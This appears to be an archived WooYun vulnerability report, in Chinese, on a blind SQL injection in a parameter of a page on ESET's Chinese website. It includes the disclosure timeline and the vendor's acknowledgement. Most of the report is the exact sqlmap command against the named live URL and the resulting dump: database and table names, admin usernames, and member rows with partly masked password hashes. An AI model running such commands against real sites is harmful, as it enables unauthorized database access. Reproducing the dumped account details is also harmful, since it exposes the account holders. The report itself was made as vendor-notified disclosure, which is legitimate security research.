乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-16: 细节已通知厂商并且等待厂商处理中 2014-01-16: 厂商已经确认,细节仅向厂商公开 2014-01-26: 细节向核心白帽子及相关领域专家公开 2014-02-05: 细节向普通白帽子公开 2014-02-15: 细节向实习白帽子公开 2014-03-02: 细节向公众公开
0.0
time-based类型注入,目测能出数据,只是出得比较慢!注入点:http://www.eset.com.cn/share/getLang.phpPOST参数proid存在注入通知存在注入点,未做进一步测试!
python sqlmap.py -u "http://www.eset.com.cn/share/getLang.php" --data "a=eset-hk-lang&os=-1&proid=73" -p "proid" --dbs --batchsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: proid Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: a=eset-hk-lang&os=-1&proid=73' AND SLEEP(5) AND 'rPqb'='rPqb---web application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.0.11available databases [2]:[*] eset_com_cn_new[*] information_schemaDatabase: eset_com_cn_new[74 tables]+----------------------------+| diy_cdkey || diy_cdkey_edition || diy_reg || diy_sn || diy_sn_edition || download_documentation || download_installer || download_product || eset_images || eset_large || eset_register || eset_sme || eset_windows || phpcms_admin || phpcms_admin_role || phpcms_admin_role_priv || phpcms_area || phpcms_attachment || phpcms_author || phpcms_block || phpcms_c_down || phpcms_c_info || phpcms_c_info_old || phpcms_c_ku6video || phpcms_c_news || phpcms_c_news_old || phpcms_c_picture || phpcms_c_product || phpcms_c_video || phpcms_cache_count || phpcms_category || phpcms_collect || phpcms_comment || phpcms_content || phpcms_content_count || phpcms_content_position || phpcms_content_tag || phpcms_copyfrom || phpcms_datasource || phpcms_digg || phpcms_formguide || phpcms_formguide_fields || phpcms_hits || phpcms_ipbanned || phpcms_keylink || phpcms_keyword || phpcms_link || phpcms_log || phpcms_member || phpcms_member_cache || phpcms_member_company || phpcms_member_detail || phpcms_member_group || phpcms_member_group_extend || phpcms_member_group_priv || phpcms_member_info || phpcms_menu || phpcms_model || phpcms_model_field || phpcms_module || phpcms_player || phpcms_position || phpcms_process || phpcms_process_status || phpcms_role || phpcms_search || phpcms_search_type || phpcms_session || phpcms_status || phpcms_times || phpcms_type || phpcms_urlrule || phpcms_workflow || regkeyreplace |+----------------------------+Database: eset_com_cn_newTable: phpcms_admin[3 entries]+--------+-----------+----------+-----------------+-------------------+-----------------------+| userid | username | disabled | allowmultilogin | alloweditpassword | editpasswordnextlogin |+--------+-----------+----------+-----------------+-------------------+-----------------------+| 1 | v2esetwww | 0 | 1 | 1 | 0 || 2 | wwwesetv2 | 0 | 0 | 1 | 0 || 4 | linqiang | 0 | 0 | 0 | 0 |+--------+-----------+----------+-----------------+-------------------+-----------------------+Database: eset_com_cn_newTable: phpcms_member 部分数据+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+| areaid | userid | groupid | modelid | touserid | point | email | amount | message | username | disabled | password |+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+| 0 | 4 | 1 | 10 | 0 | 0 | [email protected] | 0.00 | 0 | linqiang | 0 | d665b1481fa**********b010357fa5f || 0 | 1 | 1 | 10 | 0 | 0 | [email protected] | 0.00 | 0 | v2esetwww | 0 | 2d1bc2d7b41**********e3b883ee4c6 || 0 | 2 | 1 | 10 | 0 | 0 | [email protected] | 0.00 | 0 | wwwesetv2 | 0 | aaa6e5a7fd3**********27dd68d9d9d || 0 | 3 | 6 | 10 | 0 | 0 | [email protected] | 0.00 | 0 | eset | 0 | 59efb956453**********990d5cf5cd3 |+--------+--------+---------+---------+----------+-------+---------------------------+--------+---------+-----------+----------+----------------------------------+
过滤
危害等级:高
漏洞Rank:15
确认时间:2014-01-16 15:21
感谢您的反馈,已经通知程序员检查。
暂无